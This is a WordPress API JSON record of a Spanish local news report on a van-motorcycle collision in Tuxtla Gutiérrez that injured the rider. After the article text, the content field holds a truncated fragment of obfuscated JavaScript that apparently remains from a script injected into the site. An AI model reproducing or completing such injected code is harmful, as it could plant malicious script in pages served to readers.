{"id":14060,"date":"2024-02-09T03:37:48","date_gmt":"2024-02-09T03:37:48","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=14060"},"modified":"2024-02-09T03:37:49","modified_gmt":"2024-02-09T03:37:49","slug":"colectivo-y-motociclista-protagonizan-choque-en-la-9a-sur","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=14060","title":{"rendered":"Colectivo y motociclista protagonizan choque en la 9a Sur"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"576\" height=\"1024\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/02\/FB_IMG_1707449797785-576x1024.jpg\" alt=\"\" class=\"wp-image-14061\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/02\/FB_IMG_1707449797785-576x1024.jpg 576w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/02\/FB_IMG_1707449797785-169x300.jpg 169w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/02\/FB_IMG_1707449797785-768x1366.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/02\/FB_IMG_1707449797785-864x1536.jpg 864w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/02\/FB_IMG_1707449797785.jpg 899w\" sizes=\"auto, (max-width: 576px) 100vw, 576px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.Agencia ReporteCiudano, 8 de febrero del 2024. Tuxtla Guti\u00e9rrez. &#8211; Este mi\u00e9rcoles por la tarde una motocicleta y colectivo chocaron cuando circulaban en la 9a Sur y Pensil, en la zona Oriente de Tuxtla Guti\u00e9rrez.Los reportes oficiales informaron que, este hecho ocurri\u00f3 cuando el conductor de la moto Italika de color azul circulaba de Norte a Sur y fue impactado por una Toyota Hiace que realiza la ruta Tuxtla-Jaltenango y viseversa.Algunos testigos relataron que, la unidad for\u00e1nea se pas\u00f3 el alto y provoc\u00f3 el accidente y el conductor de la moto qued\u00f3 debajo.En el lugar los testigos auxiliaron al lesionado para ponerlo a salvo ya que result\u00f3 con lesiones en manos y torax por lo que fue trasladado a un nosocomio para su atenci\u00f3n m\u00e9dica especializada.En el lugar los involucrados llegaron a un acuerdo armonioso para evitar problemas legales.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho.Agencia ReporteCiudano, 8 de febrero del 2024. Tuxtla Guti\u00e9rrez. &#8211; Este mi\u00e9rcoles por la tarde una motocicleta y colectivo chocaron cuando circulaban en la 9a Sur y Pensil, en la zona Oriente de Tuxtla Guti\u00e9rrez.Los reportes oficiales informaron que, este hecho ocurri\u00f3 cuando el conductor de la moto Italika de color azul circulaba de &hellip;<\/p>\n","protected":false},"author":2,"featured_media":14061,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-14060","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/14060","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=14060"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/14060\/revisions"}],"predecessor-version":[{"id":14062,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/14060\/revisions\/14062"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/14061"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=14060"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=14060"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=14060"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}